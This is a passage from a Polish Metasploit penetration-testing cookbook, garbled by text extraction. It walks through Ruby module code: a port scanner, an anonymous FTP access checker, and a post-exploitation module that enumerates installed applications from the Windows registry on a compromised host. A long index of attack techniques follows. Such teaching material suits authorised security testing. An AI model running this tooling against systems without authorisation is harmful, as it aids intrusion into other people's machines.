'Name' => 'TCP Port Scanner', 'Version' => '$Revision$', 'Description' => 'Enumerate open TCP services', 'Author' => [ darklord ], 'License' => MSF_LICENSE )

Nast pnych kilka wierszy skryptu jest u ywanych do inicjowania jego warto ci.Opcje oznaczone jako true s zasadniczo wymagane dla modu ów, natomiast opcjeoznaczone jako no s opcjonalne. Te warto ci mog by wprowadzane lubzmieniane w trakcie uruchamiania modu u:

register_options( [OptString.new('PORTS', [true, "Ports to scan (e.g. 25,80,110-900)","1-10000"]),

OptInt.new('TIMEOUT', [true, "The socket connect timeout in milliseconds",1000]),

OptInt.new('CONCURRENCY', [true, "The number of concurrent ports to checkper host", 10]), self.class)

deregister_options('RPORT')

S pewne wspólne wiersze skryptu, które znajdziesz w ka dym module. Analiza wbudowanychskryptów jest najlepszym sposobem, aby dowiedzie si wi cej o ich budowie. Istnieje kilkaopracowa na temat tworzenia modu ów, ale najlepszym sposobem na nauk jest opanowaniepisania skryptów Ruby i analizowanie istniej cych modu ów. W nast pnej recepturze prze-analizujemy od podstaw ca y modu .

Analiza gotowego modu uW poprzedniej recepturze zapoznali my si z podstawami budowania w asnych modu ów. Na-st pnym krokiem b dzie analiza istniej cych modu ów. Je li chcesz zg bi tajniki przygoto-wywania modu ów i przyczyni si do rozwoju platformy, powiniene dok adniej zapozna size skryptami istniej cych modu ów.

Przygotuj siPrzeanalizujemy prosty modu FTP, aby zg bi tematyk budowania modu ów.

Zaczniemy od miejsca, w którym zako czyli my poprzedni receptur . Omówili my ju podsta-wowy szablon modu u, przejd my wi c od g ównej cz ci skryptu.





134

Jak to wykonaPrzeanalizujemy modu anonimowego dost pu FTP:

1. G ówny skrypt tego modu u znajduje si w folderzeopt/Metasploit/msf3/modules/auxiliary/scanner/ftp/anonymous.rbOto pe ny skrypt:

class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize super( 'Name' => 'Anonymous FTP Access Detection', 'Version' => '$Revision: 14774 $', 'Description'=> 'Detect anonymous (read/write) FTP server access.', 'References' => [ ['URL', 'http://en.wikipedia.org/ wiki/File_Transfer_Protocol# Anonymous_FTP'], ], 'Author' => 'Matteo Cantoni <goony[at] nothink.org>', 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(21), ], self.class) end def run_host(target_host) begin res = connect_login(true, false) banner.strip! if banner dir = Rex::Text.rand_text_alpha(8) if res write_check = send_cmd( ['MKD', dir] , true) if (write_check and write_check =~ /^2/) send_cmd( ['RMD', dir] , true) print_status("#{target_host}:#{rport} Anonymous READ/WRITE (#{banner})") access_type = "rw" else print_status("#{target_host}:#{rport} Anonymous READ (#{banner})") access_type = "ro" end





135

report_auth_info( :host => target_host, :port => rport, :sname => 'ftp', :user => datastore['FTPUSER'], :pass => datastore['FTPPASS'], :type => "password_#{access_type}", :active => true ) end disconnect rescue ::Interrupt raise $! rescue ::Rex::ConnectionError, ::IOError end endend

Przejd my do nast pnego punktu i przeanalizujmy skrypt szczegó owo.

Jak to dzia aZacznijmy od analizy g ównej cz ci skryptu, aby zrozumie , jak dzia a.

Ta funkcja s u y do rozpocz cia po czenia. Zmienna res posiada warto logiczn true (prawda)lub false (fa sz). Funkcja connect_login jest specyficzn funkcj u ywan przez modu w celunawi zania po czenia ze zdalnym hostem. W zale no ci od tego, czy uda si nawi za po -czenie, odpowiednia warto logiczna jest zapisywana w zmiennej res:

def run_host(target_host) begin res = connect_login(true, false) banner.strip! if banner dir = Rex::Text.rand_text_alpha(8)

Po ustanowieniu po czenia modu próbuje sprawdzi , czy anonimowy u ytkownik posiadauprawnienia odczytu/zapisu (ang. read/write). Zmienna write_check sprawdza, czy operacja zapisujest mo liwa. Nast pnie sprawdzane jest, czy operacja zosta a zako czona powodzeniem. W za-le no ci od statusu uprawnie na ekranie wy wietlany jest odpowiedni komunikat. Je li ope-racja zapisu nie powiedzie si , zostanie wy wietlony status ro lub read-only (tylko do odczytu):

if res write_check = send_cmd( ['MKD', dir] , true) if (write_check and write_check =~ /^2/) send_cmd( ['RMD', dir] , true) print_status("#{target_host}:#{rport} Anonymous READ/WRITE (#{banner})") access_type = "rw"





136

else print_status("#{target_host}:#{rport} Anonymousaccess_type="ro"

Nast pna funkcja s u y do zg aszania informacji o autoryzacji. Zawieraj one wa ne parametry,takie jak nazwa hosta, numer portu, nazwa u ytkownika, has o itd. S to warto ci, które poja-wiaj si , gdy u ywamy polecenia show options, s wi c zale ne od u ytkownika.

report_auth_info( :host => target_host, :port => rport, :sname => 'ftp', :user => datastore['FTPUSER'], :pass => datastore['FTPPASS'], :type => "password_#{access_type}", :active => true )end

To by a szybka demonstracja dzia ania prostego modu u dost pnego we frameworku Meta-sploit. Mo esz zmieni istniej ce skrypty odpowiednio do swoich potrzeb. Czyni to z tegoframeworku niezwykle przeno n platform do programowania. Jak ju powiedzieli my, naj-lepszym sposobem na nauk budowania modu ów jest analizowanie istniej cych skryptów.

W nast pnej recepturze zobaczymy, jak zbudowa w asny modu i przenie go do frameworkuMetasploit.

Budowanie w asnego modu u fazypoeksploatacyjnejOmówili my ju wszystkie podstawowe kwestie dotycz ce budowania modu ów. W tej re-cepturze zajmiemy si przygotowaniem w asnego modu u i zaimportowaniem go do frame-worku Metasploit. Budowanie modu ów mo e by bardzo przydatne, gdy daje mo liworozszerzenia funkcjonalno ci frameworku w zale no ci od w asnych potrzeb.

Przygotuj siZbudujmy ma y modu fazy poeksploatacyjnej, który przeprowadzi enumeracj wszystkich za-instalowanych na maszynie docelowej aplikacji. Poniewa jest to modu fazy poeksploatacyj-nej, b dziemy potrzebowa maszyny ze z amanymi zabezpieczeniami, aby uruchomi modu :





137

1. Aby rozpocz budow modu u, najpierw zaimportujemy biblioteki frameworkui do czymy wymagane zale no ci:

require 'msf/core'require 'rex'require 'msf/core/post/windows/registry'

Skrypt rozpoczyna si od do czenia bibliotek rdzeniowych frameworku Metasploit.Nast pnie tworzona jest klasa, która rozszerza w a ciwo ci modu ów Msf :: Post.

class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry

2. Tworzymy funkcj initialize, która jest wykorzystywana do zainicjowaniai okre lenia w a ciwo ci modu u oraz jego opisu. Ta podstawowa struktura pozostajetaka sama w prawie wszystkich modu ach. Nale y zauwa y , e dodali my wcze niejbiblioteki 'rex' oraz 'registry'. W ten sposób framework atwo rozpozna naszewymagania dotycz ce modu u.

def initialize(info={}) super( update_info( info,

'Name' => 'Windows Gather Installed Application Enumeration', 'Description' => %q{ This module will enumerate all installed applications }, 'License' => MSF_LICENSE, 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] )) end

Kolejnym krokiem jest stworzenie tabeli, która b dzie wy wietla wyodr bnionewyniki. Do tego celu mo na u y specjalnej biblioteki Rex::Ui::Text. Musimyzdefiniowa ró ne kolumny:

def app_list tbl = Rex::Ui::Text::Table.new( 'Header' => "Installed Applications", 'Indent' => 1, 'Columns' => [ "Name", "Version" ])

G ówna cz skryptu rozpoczyna si od budowania tabeli i okre lenia nazwró nych kolumn. Nast pnie tworzona jest osobna tablica lokalizacji w rejestrze,która zostanie wykorzystana do enumeracji aplikacji. Tablica b dzie sk ada siz ró nych wpisów w rejestrze, które zawieraj informacje na temat aplikacjizainstalowanych na maszynie docelowej. Informacje o aplikacjach sprzechowywane w osobnej tablicy o nazwie apps.





138

appkeys = [ 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall', 'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall', 'HKLM\\SOFTWARE\\WOW6432NODE\\Microsoft\\Windows\\ CurrentVersion\\Uninstall', 'HKCU\\SOFTWARE\\WOW6432NODE\\Microsoft\\Windows\\ CurrentVersion\\Uninstall', ] apps = []

3. Nast pnie rozpoczynamy proces enumeracji poprzez uruchomienie p tli, którasprawdza ró ne lokalizacje rejestru przechowywane w tablicy o nazwie appskey:

appkeys.each do |keyx86| found_keys = registry_enumkeys(keyx86) if found_keys found_keys.each do |ak| apps << keyx86 +"\\" + ak end end end

Kolejne wiersze skryptu maj na celu wype nienie tabeli ró nymi warto ciamiw odpowiednich kolumnach. Skrypt wykorzystuje wbudowan funkcjregistry_getvaldata, która pobiera warto ci z rejestru i dodaje je do tabeli:

t = [] while(not apps.empty?) 1.upto(16) do t << framework.threads.spawn("Module(#{self.refname})",false,apps.shift) do |k| begin dispnm = registry_getvaldata("#{k}","DisplayName") dispversion =registry_getvaldata("#{k}","DisplayVersion") tbl << [dispnm,dispversion] if dispnm and dispversion rescue endend

Kilka ostatnich wierszy skryptu s u y do zapisywania informacji w oddzielnympliku tekstowym o nazwie applications.txt. Plik jest zape niany za pomoc funkcjistore_loot function, która zapisuje pe n tabel w pliku tekstowym.

results = tbl.to_s print_line("\n" + results + "\n") p = store_loot("host.applications", "text/plain", session, results, "applications.txt", "Installed Applications") print_status("Results stored in: #{p}") end def run





139

4. Ostatecznie na ekranie wy wietlane s dane wyj ciowe z informacj o utworzeniupliku i zapisaniu w nim wyników.

print_status("Enumerating applications installed on #{sysinfo['Computer']}") app_list endend

Nast pnym krokiem jest zapisanie kompletnego programu w odpowiednim katalogu. Musiszupewni si , e wybra e w a ciwy katalog do przechowywania modu u. Pomo e to frameworkowiwyra nie okre li u yteczno modu u i utrzyma hierarchi w platformie. Utrzymanie hierar-chii podczas aktualizacji modu ów u atwi identyfikowanie przeznaczenia modu u. Zapisanienp. modu u przegl darki Internet Explorer w folderze modules/exploits/windows/browserpomo e atwo lokalizowa w tym miejscu wszelkie nowe lub istniej ce modu y przegl darki.

Okre laj c lokalizacj modu u, powiniene wzi pod uwag nast puj ce kwestie: 1. Typ modu u. 2. Dzia ania przeprowadzane przez modu . 3. Rodzaj podatnego na ataki oprogramowania lub systemu operacyjnego, dla którychmodu jest przeznaczony.

Metasploit dla przechowywania modu ów stosuje hierarchi od uogólnionego do wyspecjalizowa-nego formatu. Zaczyna si od rodzaju modu ów, takich jak modu exploita czy modu pomocniczy.Nast pna w hierarchii jest uogólniona nazwa, np. nazwa systemu operacyjnego. Dalej two-rzone s bardziej wyspecjalizowane funkcjonalno ci, które okre laj , e modu jest np. wyko-rzystywany do przegl darek internetowych. Na koniec u ywana jest najbardziej okre lona na-zwa, np. konkretna nazwa przegl darki internetowej, dla której przeznaczony jest modu .

We my pod uwag nasz modu . Jest to modu fazy poeksploatacyjnej, który jest u ywany do prze-prowadzenia enumeracji systemu operacyjnego Windows i zgromadzenia informacji o tymsystemie. Powinni my wi c przy zapisywaniu modu u zastosowa odpowiedni konwencj .

Nasz lokalizacj docelow powinien by folder modules/post/windows/gather/.

Mo esz zapisa modu z wybran nazw i z rozszerzeniem .rb. Zapiszmy go jako enum_ applications.rb.

Jak to wykonaKiedy ju zapiszemy modu w preferowanym katalogu, nast pnym krokiem b dzie urucho-mienie go i sprawdzenie, czy dzia a poprawnie. Proces uruchomienia modu u widzieli myw poprzednich recepturach.





140

U yjemy nazwy modu u, aby uruchomi go w konsoli msfconsole:

msf> use post/windows/gather/enum_applicationsmsf post(enum_applications) > show options

Module options (post/windows/gather/enum_applcations)

Name Current Setting Required Description---- --------------- -------- -----------SESSION yes The session...

Jest to prosty przyk ad tego, jak mo na zbudowa w asny modu i doda go do frameworkuMetasploit. Je li chcesz budowa dobre modu y, na pewno potrzebujesz solidnej wiedzy na tematpisania skryptów Ruby. Mo esz równie wspomóc spo eczno Metasploit poprzez publikacjswoich modu ów, aby inni mogli z nich korzysta .




Skorowidz

Aadres

IP, 184MAC, 171, 191

aktualizacjasystemu BackTrack, 28pakietu SET, 207

alokator pami ci, 91analiza

luk w zabezpieczeniach, 19modu u, 133skryptu, 266

Antiparser, 159antyphishingowy pasek narz dzi, 43AP, access point, 189aplikacja, Patrz tak e narz dzie

7zip, 87Adobe Acrobat, 107Adobe Reader, 106AVG 10, 117ESET NOD32, 116Fern WiFi Cracker, 180,

187–194Flash Player, 102MacStumbler, 198Microsoft Excel 2007, 106Microsoft Word, 104PuTTY, 31–33, 254VMware, 29VNCViewer, 271Vomit, 174Wiresh, 168

archiwum sfx, 87, 120atak

client-side, 98, 110DoS, 127, 175e-mail, 214Incognito, 276–279MiTM, 172phishing, 212

si owy, 123, 124spear-phishing, 212, 213typu z y bli niak, 198wieloaspektowy, 218WWW, 215wykorzystuj cy podszywanie

si , 173zatruwania ARP, 172

atrybuty MACE, 237audyt bezpiecze stwa, 95

sieci bezprzewodowej, 191autoryzacja, 136

Bbackdoor, 219, 221, 247BackTrack 5 R3, 13, 26, 207bajty zerowe, null bytes, 147baza danych

GHDB, 43MySQL, 126PostgreSQL, 33

BBQSQL, 37biblioteka

MSF Core, 20Rex, 20, 265shell32.dll, 259

bibliotekiDLL, 92, 94MSF, 132MSFcore, 144

blok SEH, 118Bluetooth, 179b d 404, 176b dy

bazy danych, 22instalacji Metasploit, 25po czenia z baz , 35

brama sieciowa, gateway, 229budowanie, Patrz tworzenie

Ccertyfikat, 71, 211certyfikat SSH, 33ciasteczka, cookies, 193czynno ci wst pne, 18

Ddeklaracje funkcji, 268deszyfrowanie w locie, 193DLL, Dynamic Link Library, 94dodatek Railgun, 259, 260dodawanie

bibliotek DLL, 261DLL do Railgun, 261parametrów, 263trasy, 184

dokumentacja narz dzia Railgun, 261domieszki exploitów

Exploit::BruteTargets, 142Exploit::Capture, 143Exploit::Remote::DCERPC, 142Exploit::Remote::Ftp, 142Exploit::Remote::MSSQL, 143Exploit::Remote::SMB, 142Exploit::Remote::TCP, 142Exploit::Remote::UDP, 142

domieszki Meterpretera, 255, 257cmd_exec, 257eventlog_clear, 257eventlog_list, 257file_local_write, 257is_admin?, 257is_uac_enabled?, 257registry_createkey, 257registry_deleteval, 257registry_delkey, 257registry_enumkeys, 257registry_enumvals, 258registry_getvaldata, 258




Skorowidz

292

domieszki Meterpreteraservice_create, 258service_delete, 258service_info, 258service_list, 258service_start, 258service_stop, 258

DoS, Denial of Service, 128, 175dost p

do interfejsu, 251do Metasploit, 24zdalny, 83

dowód koncepcji, proof of concept,147

dzia anieexploita dcom, 84systemu VoIP, 162

dzienniki firewalli, 51

Eedytor tekstowy gedit, 264eksploatacja, 19

aplikacji PHP, 274typu client-side, 97

elementy TLV, 234enumeracja, 42, 127exploit, 20, 39, 77, 141–159

dcom, 84KiTrapOD, 233lsa_transnames_heap, 89ms03_026_dcom, 79, 83ms08_067_netapi, 276ms10_087_rtf_pfragments_bof,

104ms11_021_xlb_bof, 106webdav_dll_hijacker, 92

extranet, 42

Ffa szywy

podpis apletu, 218punkt dost powy, 198, 200

fazapoeksploatacyjna, 19skanowania i enumeracji, 164

filtr antyphishingowy, 43firewall, 31, 232floodowanie, 176folder

exploit, 143gather, 130modules, 122

footprinting, 42

formatmodu u exploita, 144RTF, 104SWF, 103U3D, 106, 108

frameworkAntiparser, 159BBQSQL, 37Karmetasploit, 201Metasploit, 19

funkcjacheck(), 145CMshtmlEd::Exec(), 99connect_login, 135def initialize(), 145exploit(), 145, 151initialize(), 144, 150IsUserAnAdmin, 259Targets_exec(), 271VirtualAlloc, 118wrong_meter_version(), 268

funkcje Meterpretera, 224fuzzer, 156

protoko owy, 154serwera FTP FileZilla, 156

fuzzowanie aplikacji, 153

Ggenerator zainfekowanych

no ników danych, 219generowanie

hase , 124pliku binarnego, 108

geolokalizacja, 194, 196GHDB, 43GUI, Graphical User Interface, 21,

180

Hhas o, 168hopper VoIP, 171hostowanie samodzielne, 162

IIAENG, 7identyfikacja systemu operacyjnego,

50identyfikator

procesu, PID, 242, 271us ugi, SSID, 201

IIS, Internet Information Services,128

importowaniemodu u exploita, 152wyników skanowania, 70

informacjeo autoryzacji, 136o otwartych portach, 98o systemie operacyjnym, 98

instalowaniebazy danych, 33exploita, 81Fern Wi-Fi Cracker, 181frameworku Metasploit, 23, 26laboratorium, 164maszyny wirtualnej, 29

interfejsAPI, 255API Meterpretera, 258bazy danych, 63DCOM, 81graficzny u ytkownika, GUI, 21msfcli, 21msfconsole, 21, 34msfgui, 21msfweb, 21u ytkownika, UI, 21

internet, 42intranet, 42

Jj zyk

Python, 191Ruby, 84Visual Basic, 87, 120

KKarmetasploit, 201klient SSH, 31klonowanie, 30

adresu URL, 216frameworku Metasploit, 25

kod pow oki, 108, 109kod pow oki syringe.sh, 119, 120kodowanie msf, 87komenda, Patrz poleceniekomentarze, 263komunikacja klient-serwer, 227konfigurowanie

bazy danych, 33BBQSQL, 38Fern Wi-Fi Cracker, 181kana ów komunikacji, 234Karmetasploit, 201laboratorium, 164




Skorowidz

293

maszyny wirtualnej, 30Metasploit

na maszynie wirtualnej, 31w Ubuntu, 23w Windows, 21

monitorowania, 198pakietu SET, 208trasy, 253w asnego serwera pocztowego,

214konsola msfconsole, 60, 93, 100kontrola nad maszyn docelow , 85konwertowanie

exploita, 147, 149rekordów DNS, 45

Llaboratorium, 164liczba pakietów IVS, 191Linux, 88lista

hase , 125RBL, 212skanerów, 122SURBL, 212

lukaAdobe Flash Player, 102DBMS_METADATA XML, 127execCommand

Use-After-Free, 99RFI, 274typu RPC dcom, 79U3D Memory Corruption, 107w zabezpieczeniach, 19, 65, 76

obs ugi znacznika DoABC, 102przegl darki, 98, 99us ug IIS, 128

adowanie Meterpretera, 224adunek, 20, 76, 77

adduser, 80bind_tcp, 84, 92reverse_tcp, 104shell_bind_tcp, 90

amanie zabezpiecze szyfrowania,187, 189

MMACE, 237MAFIA, 239maska sieci, netmask, 229

maszyna wirtualna, VM, 30mechanizm obronny ASLR, 106Metasploit, 19Meterpreter, 114–116

atak Incognito, 276dodatek Railgun, 259domieszki, 255interfejs API, 258konfiguracja kana ów

komunikacji, 234migracja procesu, 232polecenia sieciowe, 229polecenia systemowe, 225polecenia systemu plików, 227poszerzanie uprawnie , 232przechwytywanie uderze

klawiatury, 239przekierowanie portów, 252skrypty, 243trwa e po czenie, 247zacieranie ladów, 237

metoda talloc chunk overwrite, 91metody SIP, 163MIB, Management Information

Base, 63migracja procesu, 232MiTM, Man in The Middle, 172modelowanie zagro e , 18modu , 20

adobe_libtiff, 102client_ftp.rb, 154dost pu FTP, 134fazy poeksploatacyjnej, 136Fern Cookie Hijacker, 193filezilla_fuzzer.rb, 158GPS, 196ms10_065_ii6_asp_dos, 128mysql_enum, 126sip_invite_spoof, 174skanera mysql_login, 123snmp_enum, 63ssh_version, 60, 61

modu owa struktura exploitów, 144modu y

administracyjne, 125exploitów, 91fazy poeksploatacyjnej, 130fuzzerów, 143, 153pomocnicze skanera, 122w asne, 136wstrzykni cia zapytania, 127

monitorowanie interfejsówsieciowych, 182

Nnarz dzia

32-bitowe, 2864-bitowe, 28MAFIA, 239socjotechniczne, 40, 42, 205

narz dzieaircrack-ng, 198crunch, 124DLLHijackAudit, 95dig, 44dnmap, 52, 53do automatyzacji, 207etherape, 186ettercap, 209Fern WiFi Cracker, 180gAlan, 148Greenbone Security Assistant,

74iaxflood, 175, 177inviteflood, 175, 176ipconfig, 183Karmetasploit, 202keimpx, 56, 57kismet, 196msfencoding, 111msfpayload, 108msfvenom, 146, 147Nessus, 65–68NeXpose, 68, 69nmap, 47, 49, 51, 89nslookup, 44OpenVAS, 70–74Railgun, 261rtpflood, 175, 176sipcrack, 169smap, 165, 167strzykawki, 85, 88, 118svwar, 165, 166tcpdump, 182, 186ucsniff, 172, 173voiphopper, 170whois, 44Xplico, 167

nas uchiwacz, 107, 211frameworku Metasploit, 221po czenia zwrotnego, 110

nazwany potok, named pipe, 233niew a ciwe u ycie wska nika, 102NTLM, NT LAN Manager, 245numer wewn trzny SIP, 172NVT, Network Vulnerability Tests,

71




Skorowidz

294

Oobs uga

po cze zwrotnych, 270wyj tków j dra, 233

odmowa us ugi, 128odpowiedzi SIP, 163omijanie

firewalli, 232ochrony antywirusowej, 99systemów detekcji w ama , 232zabezpiecze DEP, 102

opcjaautoodtwarzania, 219, 221CYCLIC, 155ENDSIZE, 155ERROR, 155EXTRALINE, 155FUZZCMDS, 155SRVHOST, 155SRVPORT, 155STARTSIZE, 155STEPSIZE, 155

opcjeBBQSQL, 38polecenia persistence, 248polecenia smap, 166typu plików, 108

otwarte porty, 187otwarty serwer FTP, 62

Ppakiet, 155

ARP, 171Karma, 201narz dzi socjotechnicznych, 40SET, 206sipcrack, 169

parametr/F, 118BASENAME, 93C, 110FILENAME, 105LHOST, 105, 109LPORT, 109o, 109PASSWORD, 126RHOST, 80SRVHOST, 93SRVPORT, 93

PDA, Personal Digital Assistant,194

penetracja maszyny docelowejwi zanie pow oki, 83z Linuksem, 88

z Windows 8, 85z Windows XP SP2, 78

personifikacja, 233nazwanego potoku, 233tokenu, 278

phishing, 198, 212piaskownica, 218PID, process ID, 242pivoting, 229, 250, 252plik, Patrz tak e skrypt

backdoor.exe, 88database.yml, 34, 35dnmap_client.py, 54karma.rc, 202konfiguracyjny, 38policy.txt, 93priceinfo.rtf, 105resume.pdf, 108s.bat, 87set_config, 208, 212s ownika, 191syringe.exe, 119syringe.sh, 85

pliki.exe, 85.pdf, 103, 108.swf, 103.vbs, 250.xlb, 106

podatno na ataki, 75podsie , subnet, 229pods uch MiTM, 172podszywanie si

pod adresy MAC, 171pod inn osob , 173

poleceniainterfejsu msfconsole, 100sieciowe Meterpretera, 229systemowe Meterpretera, 225systemu plików Meterpretera,

227polecenie

background, 226bbqsql, 39db_connect, 34db_nmap, 36dig, 45, 46download, 228enumdesktops, 239execute, 235exit, 227exploit, 153getdesktop, 239, 241getpid, 226getsystem, 115, 232, 246getuid, 226

ipconfig, 31, 230, 251keyscan, 242keyscan_start, 242ls, 175migrate, 234msfconsole, 60msfpayload, 109msfvenom, 146nmap, 36, 47nslookup, 45portfwd, 187, 231, 253ps, 115, 226pwd, 228route, 230, 252run scraper, 243search, 228search Samba, 89set, 77setg, 78shell, 227show exploits, 77show options, 80, 127show payloads, 80show targets, 80sysinfo, 226taskkill, 118tasklist, 117timestomp, 237, 238unsetg, 78voiphopper, 171whois, 45write, 236

po czeniepow oki, 93, 99SSH, 31TCP, 48, 49, 84three-way handshake, 49trwa e, 247typu threeway handshake, 47z baz danych, 35z maszyn atakuj cego, 93z nas uchiwaczem, 219

ponowne wykorzystanie kodu, 266poszerzanie uprawnie , 232po wiadczenia SMB, 56pow oka

cmdshell, 126go cinna, 274Meterpretera, 115Ruby, 256

pozyskiwanie hase , 168program, Patrz aplikacja, narz dzieprogramy antywirusowe, 117protokó

NTLM, 245NTLMSSP, 57




Skorowidz

295

RTP, 163SIP, 163SMB, 56SNMP, 63SSH, 59TLS, 163

przechowywanie rezultatów, 36przechwytywanie

pakietów, 198pakietów ciasteczek, 193sesji, 191uderze klawiatury, 239

przegl darka Microsoft InternetExplorer, 100

przekierowanie portów, 231, 252, 254przepe nienie

bufora, 92, 106sterty, 91stosu, 104, 148

przeprowadzanie testówpenetracyjnych, 18

przeskakiwanie VLAN-ów, 169, 171przygotowywanie testów

penetracyjnych, 29PTES, 18pulpit Winlogon, 240punkt dost powy, AP, 189punkty ko cowe sieci, 98

Rranga, rank, 79RBL, Real-time Blackhole List, 212rekordy

NVT, 72SPF, 46

RFB, Remote Frame Buffer, 271RFI, Remote File Inclusion, 274rodzaje ataków spear-phishing, 212rozmiar stosu, 148rozszyfrowywanie hase , 247RPC, Remote Procedure Call, 81RTP, Real time Transport Protocol,

163

Sschemat laboratorium, 164schematy kodowania, 111SEH, Structured Exception

Handler, 118serwer

backdoorów, 248dnmap, 53FTP FileZilla, 156

IIS, 128PBX, 165pocztowy sendmail, 209RBL, 212VNC, 271

SET, Social-Engineer Toolkit, 40,205

siebezprzewodowa, 179VoIP, 161, 171

SIP, Session Initiation Protocol, 163skaner

portów, 185ScanSSH, 62smap, 166

skanowanie, 41ACK, 48, 50adresów IP, 186FTP, 62luk w zabezpieczeniach, 65, 70nmap, 36po czenia TCP, 47, 49portów, 47, 52po wiadcze SMB, 56, 58punktów dost powych, 189SYN, 48, 50TCP, 186UDP, 48, 50wersji SSH, 59za pomoc narz dzia NeXpose,

68skróty hase , 247skrypt

AcroJS, 102anonymous.rb, 134arp_scanner, 184dir_scanner, 122enum_logged_on_user.rb, 131hashdump, 245, 246killav.rb, 113, 117metsvc, 248persistence, 248scraper.rb, 243screen_spy.rb, 131startowy, 35trwa ego po czenia, 271VB, 87, 120winenum.rb, 245

skrypty Ruby, 265skryte skanowanie, 48SNMP, Simple Network

Management Protocol, 63socjotechnika, 205SPF, Sender Policy Framework, 46spoofing, 198

SPR, Sender Policy Framework,212

spryskiwanie sterty, 102standard

Bluetooth, 179PTES, 18SANS, 42Wi-Fi, 179

stoswykonawczy, 148wywo a , 148

stosowanie domieszek, 264stowarzyszenie in ynierów, 7struktura modu u, 143SURBL, 212synchronizacja z baz NVT, 71system VoIP, 162systemy detekcji w ama , 48, 232szare listy, 212szyfrowanie

WEP, 187WPA, 187

cie ka dost pu do modu u, 126ledzenie wspó rz dnych

geograficznych, 194

Ttabela routingu, 253TEB, Thread Environment Block,

233technika pass the hash, 245technologia VoIP, 161telefonia IP, 162terminal systemu BackTrack, 109testowanie

modu u exploita, 152z minimaln wiedz , 154

testyobci eniowe, 175penetracyjne

sie bezprzewodowa, 179sie VoIP, 161Windows 8, 85Windows XP, 78

t czowe tablice, 246, 247TLS, Transport Layer Security, 163TLV, Type-Length-Value, 234tokeny

delegowania, 276personifikacji, 276

topologie VoIP, 162




Skorowidz

296

transfer danych SWF, 103tworzenie

fuzzera, 156katalogu dziennika skryptu, 269adunku, 214

modu u, 136nas uchiwacza, 107skryptów po cze trwa ych, 269skryptu, 263z o liwego pliku, 105

UU3D, Universal 3D, 108Ubuntu, 23UI, user interface, 21ukrywanie okna polece , 120uprawnienia

odczytu/zapisu, 135u ytkownika, 115

uruchamianieapletu, 218exploita, 90modu u, 139

urz dzeniePDA, 194Zoiper, 176

us ugaLSA RPC, 91online SIP, 163Samba, 89

us ugihostowane, 162programów antywirusowych, 116

ustawienia adaptera sieciowego, 31usuwanie bazy danych, 35uszkodzenie pami ci, 106u ytkownik

Admin, 71root, 71, 112

u ywanie modu u pomocniczego,123

VVLAN hopping, 170VNC, Virtual Network Computing,

271VoIP, 161

Wwabik, 51walidacja, 268walidacja rekordów SPR, 212wardriving, 194–198wektor ataku

spear-phishing, 212wieloaspektowego, 218WWW, 215

wersja SSH, 59weryfikacja

tre ci, 212wersji, 264

wiadomo e-mail, 215wi zanie pow oki, 83wiersz polece , 78, 117Wi-Fi, 179Windows, 21Windows 2003, 128Windows 7, 116Windows 7 Ultimate, 92Windows 8, 85, 120Windows XP SP2, 78Windows XP SP3, 98wspó czynnik wykrycia, 111wstrzykiwanie

bibliotek DLL, 92serwera VNC, 271zapyta , 37

wybórexploita, 79, 89adunku, 80, 90

wykonywanie skryptu na maszyniedocelowej, 271

wykrywanieadresu MAC, 172ciasteczek, 194systemu operacyjnego, 50wersji us ug, 50

wy czanieochrony antywirusowej,

113–116us ug, 118

wyszukiwanie sieci Wi-Fi, 194wyszukiwarka SHODAN, 43wy wietlanie

komunikatu, 265skryptu, 267wyników, 263

wywo anieprint_error, 256print_good, 256print_line, 256print_status, 256

Zzachowanie konwencji pliku, 264zacieranie ladów, 237zainfekowane no niki danych, 219zamiatanie SNMP, 63zamykanie kana u, 236zapis plików, 270zapytanie SQL, 127zastosowania Meterpretera, 11zbieranie informacji, 18, 41

aktywne, 42pasywne, 42, 44za pomoc narz dzi

socjotechnicznych, 42zdalne

wstrzykiwanie serwera, 271wywo anie procedury, 81

zdalny dost p, 83z amany klucz szyfruj cy, 191z o liwe hiper cze, 98z o liwy

adres URL, 98plik, 105

zmienne globalne, 263znak

wieloznaczno ci, 117zach ty, 102

zwi kszanieanonimowo ci, 51uprawnie , 129

dania SIP, 163danie autoryzacji SIP, 168




http://program-partnerski.helion.pl

tytuł oryginału: metasploit penetration testing cookbook ...metasploit. receptury pentestera 122...

Documents